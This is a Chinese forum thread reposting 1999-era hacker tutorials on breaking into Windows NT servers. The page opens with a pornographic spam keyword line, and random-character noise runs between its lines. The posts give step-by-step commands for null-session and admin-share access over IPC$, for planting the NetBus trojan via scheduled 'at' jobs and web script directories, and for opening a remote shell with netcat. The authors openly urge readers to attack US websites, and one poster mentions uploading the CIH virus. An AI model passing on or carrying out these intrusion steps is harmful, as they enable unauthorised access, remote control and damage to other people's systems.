久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖
汶上信息港
標(biāo)題:
關(guān)于“怎樣進(jìn)入NT主機(jī)”的幾點(diǎn)補(bǔ)充
[打印本頁(yè)]
作者:
雜七雜八
時(shí)間:
2011-1-13 17:03
標(biāo)題:
關(guān)于“怎樣進(jìn)入NT主機(jī)”的幾點(diǎn)補(bǔ)充
《版主頁(yè)黑客工具和文章的幾個(gè)問(wèn)題》中提到:
' s! V; S; x" i( Y$ h
請(qǐng)教,從版主頁(yè)上載得PINGER,GRINDER,LETMEIN等,卻不能用,PINGER安裝后,明明安裝前文件有1M多,但安裝完后生成的文件夾中只有PINGER。EXE,40多K,運(yùn)行PINGER,設(shè)置好IP,點(diǎn)PING,彈出一個(gè)窗口(C++。。。),說(shuō)出錯(cuò),然后關(guān)閉了,何故,是不是安裝有誤? 2。運(yùn)行LETMEIN,彈出以下錯(cuò)誤:連接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否說(shuō)明需要NETAPI32。DLL文件,哪里有該DLL。 3。USAKILLER 的教學(xué)文章中提到需在WINNT4。0下運(yùn)行以下步驟等,是否要求我的操作系統(tǒng)也是WINNT4。0 ,應(yīng)該不是吧? 4。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務(wù)器的操作系統(tǒng)為NT? 太多的問(wèn)題需高手回答,我花那么多的時(shí)間和金錢(qián)下載這幾M文件卻不能用,實(shí)在窩囊哦, 強(qiáng)烈建議USAKILLER 等高手級(jí)的黑客寫(xiě)更多的教學(xué)文章,以提高我國(guó)黑客水平。
) O% ?! X/ m0 B% z
> 我的機(jī)子MMX166,WIN98,2。5G,32M內(nèi)存。
5 D/ r$ W s. Z' y& \ b
5 Q) Q8 u: p: w/ ^$ ~( @7 O
黑客并不神秘,你只要了解操作系統(tǒng),學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn),輔助相關(guān)的工具,就可以成功。
- f5 V& i2 W& [
你的問(wèn)題是,pinger, grinder, letmein等工具必須要在NT上運(yùn)行,我們強(qiáng)烈建議,你一定要安裝NT,對(duì)于你的機(jī)器配制,和我們現(xiàn)在差不多,只是比你多了32M內(nèi)存,2G硬盤(pán)。
; l; s$ a$ Z A p+ ]. k
其實(shí),攻擊敵站,利用其操作系統(tǒng)本身的工具就可以了,比如,我們?cè)贜T上攻擊某服務(wù)器,該服務(wù)器為NT4.0,我們將做如下簡(jiǎn)單事情就有可能成功,假設(shè)目標(biāo)NT的IP地址為111.111.111.111,做法如下:
1 C1 p( ~, U) @3 A
net use \\111.111.111.111\ipc$ "" /user:""
b3 v/ F! n$ b% p
net.exe是NT的工具文件,該命令將和目標(biāo)服務(wù)器建立Null Session,如果成功,你可以查看該服務(wù)器上的共享目錄:
- H0 t: V, Z, P2 @. l* R
net view \\111.111.111.111
4 E& e- y% t6 _* M5 f4 O3 d
當(dāng)然,如果你有該NT管理員密碼,就更好辦了,假設(shè)其管理員Admin密碼為fuck:
2 |; A# b. F8 G" V4 h+ r
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
% ^& y+ T3 t- C8 @4 ^7 d
命令成功后,幾乎所有目標(biāo)NT上的配制,資源,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來(lái)查看或修改:
* L8 t8 b! J, h! K
1、查看或修改遠(yuǎn)程機(jī)器上的硬盤(pán),假如目標(biāo)NT上有C、D兩個(gè)硬盤(pán):
* w0 y; ~8 v5 [% z: G" F
net use x: \\111.111.111.111\c$
# w/ _1 y$ X% N& T& D: q- t
net use y: \\111.111.111.111\d$
5 H3 O/ a! w. e% z
這樣,目標(biāo)NT上的C、D盤(pán)分別被影射為你本地的X、Y盤(pán),你想怎么做都可以...
! @: ]3 L G8 r7 Y4 a
2、管理目標(biāo)NT的用戶:
9 g% F0 I) u4 U% M" K
從“開(kāi)始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
. U/ a: O$ e0 F3 M( J$ k2 P
鍵入\\111.111.111.111后,目標(biāo)NT上的所有用戶你想怎么做都可以,和管理你本地的一樣
+ T+ Y2 v9 P3 _
3、管理目標(biāo)NT的服務(wù)
9 _- R+ k. ]) N; |# p
選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域”
; O8 j1 T# C: w* j: t S+ T2 r7 h; E# m
這樣你可以管理目標(biāo)NT上的服務(wù),共享目錄
, D$ q0 a8 ^% d5 z" R0 {4 v7 u
4、IIS管理
- h1 z6 H1 G8 t8 u( b0 }( b! U
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
2 `* i8 v+ e2 m' T4 N- h( p
目標(biāo)NT的FTP、WWW服務(wù)你就可以重新配置
u2 ~4 ~* _$ [1 I: k
5、事件管理
! c. V8 K, G/ P& S
“事件查看器”->連接到服務(wù)器->111.111.111.111
9 r4 Q& U. t* k8 _5 T
; u' H( I1 \" D: ^4 @' {9 Y' p1 x
還有更多的東西,都可以用NT本身的功能來(lái)完成,這些都是95, 98所不能實(shí)現(xiàn)的。
# {# r6 T/ d( v! t- P* t; a3 s
0 A j, b# I7 r6 I" z7 Z- z. i
當(dāng)然,98,95也能做一些事情,但很麻煩,比如:
- e% y# v. I& K1 B) J2 G
net use \\111.111.111.111\ipc$
( X1 ^2 q z& Y' X* E! Q
net use z: \\111.111.111.111\d$
' p" _6 {+ J6 k! i
但其后不能帶參數(shù),即改用其他用戶或密碼,系統(tǒng)將用當(dāng)前用戶和密碼去登錄,如果你知道目標(biāo)NT的用戶或密碼,重新啟動(dòng)95, 98,改用該用戶和密碼登錄,方可實(shí)現(xiàn),你可以連接目標(biāo)NT上的共享資源,但不能進(jìn)行管理,如用戶、事件等
5 k% X1 J5 H* x1 k, O- W- N! T
8 B) l3 k, g) }" f5 y" H
我們強(qiáng)烈建議各位有心要為死難者報(bào)仇,真正的想黑霉國(guó)的站點(diǎn),花點(diǎn)時(shí)間,裝個(gè)NT吧,NT Workstation也可以!
3 P: ], ~8 E8 |) |" Z/ U
這樣,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用!
6 e2 ~9 R$ @/ n& [& e4 e3 ^
3 P$ m7 L9 q S. ?
s& Q, T& c* _) w
--------------------------------------------------------------------------------
& y$ K7 N) O. J, ~. }
7 l1 `4 s) x! @1 q/ e" u5 A
>quack于1999-06-12,23:37:44
5 a" j7 ~7 e( \0 Z. S+ j
在大作《幾個(gè)有關(guān)黑的問(wèn)題》中提到:
- ?2 U, [2 y m4 ~! u- W, l
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時(shí)候沒(méi)有用到MYPWD的參數(shù),鍵入LETMEIN查詢(xún)其使用方法時(shí)亦無(wú)此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢(xún)到的IP地址若無(wú)機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無(wú)法登陸?再有,假定我上傳了CIH,對(duì)了,CIH對(duì)NT暫時(shí)無(wú)效,假定上傳其它"有益"美國(guó)NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國(guó)機(jī)子,但運(yùn)行程序時(shí)卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國(guó)鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說(shuō)一句,我還真干掉了幾個(gè)美國(guó)人,哈!。
; J$ m f8 d8 Q
" o5 i+ a& R$ v' x- c- X
killusa于1999-06-13,03:25:15
/ a1 {* U" I* P# }. H8 A9 S# P
在大作《Re: 幾個(gè)有關(guān)黑的問(wèn)題》中提到:
3 ?! d0 J9 G+ Z' Y
, y) T- Q2 l2 f( j9 e
letmein.exe 暫時(shí)沒(méi)有mypwd參數(shù),十分抱歉
6 p+ n( W+ A8 {
pinger程序,只是利用ping來(lái)尋找主機(jī),每臺(tái)NT服務(wù)器有一個(gè)主IP地址,但也可以設(shè)置多個(gè)輔助IP地址,比如有些服務(wù)器供應(yīng)商,一臺(tái)NT服務(wù)器上可以設(shè)置一千多個(gè)IP,每個(gè)IP對(duì)應(yīng)一個(gè)Hostname,而真正能找到主機(jī)名的只有一個(gè)IP地址,就是該主機(jī)的主IP地址,所以有時(shí)顯示只有IP,而無(wú)主機(jī)名。另外,有些服務(wù)器是非NT的操作系統(tǒng),有時(shí)將不會(huì)顯示主機(jī)名。當(dāng)然,有時(shí)在服務(wù)器上進(jìn)行一些設(shè)置,也會(huì)出現(xiàn)上面的情況。
% d- T# b: {. I$ u; D
t6 a, S4 P2 o0 d+ h, U. o% j
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個(gè)程序,所以,netbus.exe是不用上傳的,只需在目的
! }$ Q. }# Y( d4 M
服務(wù)器上運(yùn)行ntsrv.exe,而在目的服務(wù)器運(yùn)行該程序有很多種方法:
9 J) F8 g8 O" u6 o. a! R
3 k: l! p# q, d/ C
1、利用服務(wù)器的 Schedule 服務(wù)來(lái)啟動(dòng)schedule 服務(wù)是指在服務(wù)器上定時(shí)運(yùn)行某程序,具體使用方法,可在自己的NT Dos窗口下鍵入以下:
! U; ?3 K$ M! K+ B
& z( _4 x e) l
C:\>net start schedule
6 J8 V! N; o, L5 U
Schedule 正在啟動(dòng)服務(wù).....
1 s: K4 E0 \. m+ m. q
Schedulw 服務(wù)啟動(dòng)成功。
+ [3 S0 O. z/ Z& ~$ s5 w9 ^ V
C:\>at /?
0 e" N1 I/ c, T' {+ K0 `' {2 _# i
AT 命令排定在特定的日期和時(shí)間運(yùn)行某些命令和程序。
( Q( Z `7 N" K( d
運(yùn)行 AT 命令之前必須先啟動(dòng) Schedule 服務(wù)。
5 E$ Q! `2 b7 @3 X. N" x: U& I
' \0 S7 M0 A: y7 T4 T
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
1 q" ^* m3 Q0 w
AT [\\computername] time [/INTERACTIVE]
% ]$ Z! M0 q# `3 [: K
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
6 `$ P) Z+ U1 \! Y5 o& R4 r! h- v) E
' u& ^' J. \ P: W6 ]* k
\\computername 指定遠(yuǎn)程計(jì)算機(jī)。 如果省略這個(gè)參數(shù)
6 S C/ U6 a. x/ X( y) w. U
命令會(huì)被排定在本機(jī)上運(yùn)行。
1 f; n1 K% I+ i( x
id 指定給排定進(jìn)度命令的識(shí)別號(hào)。
+ E V- H3 o' ^* l: Y0 \
% l8 g+ g7 e/ C
/delete 刪除某個(gè)已排定進(jìn)度的命令。如果省略標(biāo)識(shí),計(jì)算機(jī)上所有已排定進(jìn)度的命令都會(huì)被刪除。
6 S8 R) Z5 o, A+ U1 B) _7 M
/yes 用于刪除所有作業(yè),且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息 。
. v0 J; X1 @5 }
time 指定命令運(yùn)行的時(shí)間。
$ ?2 d: l5 R( X4 S5 W" R3 ]
/interactive 允許作業(yè)在運(yùn)行時(shí),與用戶通過(guò)桌面交互。
* d2 P- K( L6 y; _5 n. R: B
1 a! T7 f5 {. T+ a9 T2 X% \5 R
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令。
7 Q. Q0 s5 z0 |" b6 }' L
如果省略日期,則默認(rèn)為在每月的本日運(yùn)行。
( {1 Y! b J6 U4 M8 a+ E4 ^
" z) {/ z3 c3 Y) M
/next:date[,...] 指定在下一個(gè)指定日期 (如,下周三),運(yùn)行命令。如果省略日期,則默認(rèn)為在每月的本日運(yùn)行。
" W& D! n& ?' i! }
2 ` x1 s: V, a% m
"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件。
" i3 [ ~4 A9 D( [4 l1 a
6 ~4 J' l1 n1 b: E0 Q0 f, p" X: f! E- P
C:\>
; [) {* n& D5 _, y
% x* A" Y- e+ S: k
知道了如何使用AT,再來(lái)看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:
+ p5 N H" h2 p, _) K4 m
1 利用管理員登陸到目的服務(wù)器,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
$ ?$ b, P9 g, R9 b
2 利用ntsrv.exe啟動(dòng)遠(yuǎn)程: netsvc \\x.x.x.x schedule /start
S$ `9 f _5 b5 [& i7 p% J
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行,當(dāng)然最快運(yùn)行最理想,所以,你可以用letmein.exe得到服務(wù)器的時(shí)間,然后:
& h' R! `2 r N7 E- F0 O
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
, M/ E1 V0 @0 ?% B* J. o8 r6 V# \
其中00:00要改為用letmein.exe得回來(lái)的具體時(shí)間+一點(diǎn)容量,等一會(huì)后,再在本地啟動(dòng)netbus.exe,鍵入目的服務(wù)器得ip地址或hostname,連接!具體使用可參照 "How to get in nt",比如第一種方法,你想要在目的服務(wù)器運(yùn)行 LEGION,可以利用netbus得上傳功能,將LEGION上傳至目的服務(wù)器,再用netbus的"Start program",鍵入完整路徑的LEGION運(yùn)行程序,就ok了!第二種方法是利用netbus的“App redirect”功能,啟動(dòng)遠(yuǎn)程telnet服務(wù),如下:在netbus中擊“App redirect”,鍵入"C:\>winnt\system32\cmd.exe",Port為:4321,服務(wù)就啟動(dòng)了,然后在本地運(yùn)行:nc x.x.x.x 4321,出現(xiàn)dos啟動(dòng)的畫(huà)面就表示連接成功:
7 ?& U/ n" ^7 y. r9 r% g
Microsoft(R) Windows NT(TM)
9 P6 f* z J) \& I
(C) Copyright 1985-1996 Microsoft Corp.
; a& ~3 q$ d' q: C& P/ _" K1 y
C:\>
4 p" _( K* j" C" _1 f: N
$ l: J4 H( Y9 B
2、利用web啟動(dòng)ntsrv.exe或其他程序在目的服務(wù)器
( u/ N+ ^' b: p: M! ~
! | s3 J S7 Y% {* B: H+ e
將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄,如cgi-bin或scripts,然后在瀏覽器鍵入url如:
3 P1 e m; P$ ^
http://x.x.x.x/scripts/ntsrv.exe
/port:64321
; d( a" l# P8 N
或
http://x.x.x.x/cgi-gin/ntsrv.exe
/port:64321
" C! [) W; p; n! Y0 H: J' Z$ y/ h
該程序就啟動(dòng)了
/ p/ A4 O& I5 J& P
3 U2 u' x; Y7 p" m* f
我只提這幾中方法!
7 U+ b( I5 b2 x1 D R- l$ M$ C
要成功,必須打好基礎(chǔ)工,對(duì)操作系統(tǒng)充分了解!
2 A, s7 c6 r: ]
5 [" }+ h& |1 Z* k
歡迎光臨 汶上信息港 (http://www.junkejituan.com/)
Powered by Discuz! X3.5